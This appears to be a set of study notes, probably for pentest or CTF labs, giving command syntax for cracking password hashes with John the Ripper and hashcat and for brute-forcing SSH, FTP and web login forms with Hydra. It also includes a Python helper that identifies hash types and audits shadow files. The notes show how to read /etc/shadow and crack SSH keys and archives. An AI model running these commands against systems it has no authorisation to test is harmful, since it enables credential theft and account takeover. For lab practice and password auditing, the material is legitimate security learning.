John The Ripper
John auto-detects the hash type when no format is given:
john --wordlist=/path/to/wordlist <path to hash file>
To id your hash use: python3 hash-id.py
Specific hash type:
john --format=<hash type> --wordlist=/path/to/wordlist <path to hash file>
-The raw- prefix may be needed for unsalted hashes (e.g. raw-md5 rather than md5)
Cracking hashes from /etc/shadow:
First combine the passwd and shadow files with unshadow:
unshadow <passwd file> <shadow file> > <output file>
Then crack the output file using the syntax above.
Single Crack Mode:
john --single --format=<hash type> <file name>
GECOS
The GECOS field is one of the colon-separated fields in /etc/passwd (the user-information field, e.g. the user's full name). Single crack mode builds candidate passwords from the username and the GECOS information, which is why the unshadowed file is needed rather than a bare hash.
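As an added example (not from these notes or from John itself): a small Python helper that does the identification step by hand, mapping a hash's shape to the john --format name and hashcat -m mode, and audits /etc/shadow-style lines so locked accounts and weak algorithms can be flagged. The format names and mode numbers are the standard ones for each tool; the sample lines are constructed placeholders.

```python
import re

# Candidate (john --format, hashcat -m) pairs keyed by hash shape (standard names and
# modes). A 32-hex digest is ambiguous (MD5 or NTLM), so every candidate is returned.
PREFIXED = {"$1$": [("md5crypt", 500)], "$5$": [("sha256crypt", 7400)],
            "$6$": [("sha512crypt", 1800)], "$2a$": [("bcrypt", 3200)],
            "$2b$": [("bcrypt", 3200)], "$2y$": [("bcrypt", 3200)]}
HEX_BY_LENGTH = {32: [("raw-md5", 0), ("nt", 1000)], 40: [("raw-sha1", 100)],
                 64: [("raw-sha256", 1400)], 128: [("raw-sha512", 1700)]}
# Formats an audit should flag: unsalted fast hashes and the obsolete md5crypt.
WEAK = {"raw-md5", "nt", "raw-sha1", "raw-sha256", "raw-sha512", "md5crypt"}

def identify_hash(h):
    """Return candidate (john_format, hashcat_mode) pairs for one hash string."""
    h = h.strip()
    for prefix, candidates in PREFIXED.items():
        if h.startswith(prefix):
            return candidates
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return HEX_BY_LENGTH.get(len(h), [])
    return []

def audit_shadow(lines):
    """Classify /etc/shadow-style lines as (user, status, candidates), where status
    is 'locked' ('!'/'*'), 'empty', 'unknown', 'weak' (a WEAK candidate) or 'ok'."""
    results = []
    for line in lines:
        fields = line.rstrip("\n").split(":")   # user:hash:lastchg:min:max:warn:...
        if len(fields) < 2 or not fields[0]:
            continue  # blank or malformed line
        user, pw = fields[0], fields[1]
        if pw == "":
            results.append((user, "empty", []))
        elif pw.startswith(("!", "*")):
            results.append((user, "locked", []))
        else:
            cands = identify_hash(pw)
            status = ("unknown" if not cands else
                      "weak" if any(f in WEAK for f, _ in cands) else "ok")
            results.append((user, status, cands))
    return results

# Constructed sample lines (not real accounts); hash bodies are placeholders.
SAMPLE_SHADOW = [
    "root:$6$saltsalt$" + "a" * 86 + ":19000:0:99999:7:::",
    "svc:$1$abcdefgh$" + "b" * 22 + ":19000:0:99999:7:::",
    "nobody:*:19000:0:99999:7:::",
    "legacy:" + "c" * 32 + ":19000:0:99999:7:::",
]
```

The returned format name goes straight into --format= (john) and the mode number into -m (hashcat); a 'weak' or 'empty' result is what an audit of a real shadow file should be reporting.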
Cracking ZIP/RAR protected files:
zip2john <zip file> > <output file>
rar2john <rar file> > <output file>
-Then crack the output file using the standard john syntax
Cracking SSH private keys (ssh2john):
-Converts the id_rsa private key into a hash format john understands
-Download ssh2john or use /opt/john/ssh2john.py
ssh2john <id_rsa private key> > <output file>.txt
-Then crack the hash using the syntax above
Hashcat
https://hashcat.net/wiki/doku.php?id=hashcat - Use it to find the hash mode (-m) and attack mode (-a) numbers
-m = select hash mode (example 0 is MD5)
-a = select attack type (example 0 is dictionary attack)
Syntax example:
hashcat -m 0 -a 0 <hash file> <path to wordlist>
Hydra
-l = (small L) provide the username
-L = provide username list path
-P = provide wordlist path
-t = number of threads
ssh / ftp / http-get / http-post-form = service type (module)
If cracking an HTTP POST form, open the browser dev tools (inspect element), select the Network tab and submit a set of credentials. View the full request details, i.e. the URL and how the user and password fields are sent to the server, and make a note of the error message returned for a failed login (hydra uses it to tell failures from successes).
hydra -l admin -P <wordlist> <machine-ip> http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password incorrect" -V
Using a service on a non-standard port (-s <port>):
hydra -l admin -P <wordlist> <machine-ip> ftp -s 2121